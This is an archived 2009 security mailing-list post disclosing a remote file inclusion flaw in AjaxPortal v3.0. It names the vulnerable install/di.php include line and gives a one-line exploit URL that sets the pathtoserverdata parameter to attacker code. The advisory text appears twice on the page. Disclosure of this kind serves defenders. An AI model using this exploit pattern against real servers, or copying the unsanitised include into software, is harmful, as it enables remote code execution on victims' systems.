Back to list
|
Post reply
AjaxPortal v3.0 Remote File Inclusion Vulnerability
Jun 29 2009 02:04PM
Cru3l.b0y (cru3l b0y gmail com)
Hi Dear,
I found a new bug. please publish it.
Best Regards.
/=======================================================================
========================================================================
| |
| [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability |
| |
| Software : AjaxPortal v3.0 |
| Vendor : http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip |
| Author : Cru3l.b0y |
| Contact : Cru3l.b0y (at) deltahacking (dot) net [email concealed] |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| install/di.php |
| |
| include $pathtoserverdata."serverdata.php"; |
|
| [o] Exploit |
| |
| http://localhost/[path]/install/di.php?pathtoserverdata=[evilcode] |
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
I found a new bug. please publish it.
Best Regards.
/=======================================================================
========================================================================
| |
| [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability |
| |
| Software : AjaxPortal v3.0 |
| Vendor : http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip |
| Author : Cru3l.b0y |
| Contact : Cru3l.b0y (at) deltahacking (dot) net [email concealed] |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| install/di.php |
| |
| include $pathtoserverdata."serverdata.php"; |
|
| [o] Exploit |
| |
| http://localhost/[path]/install/di.php?pathtoserverdata=[evilcode] |
[ reply ]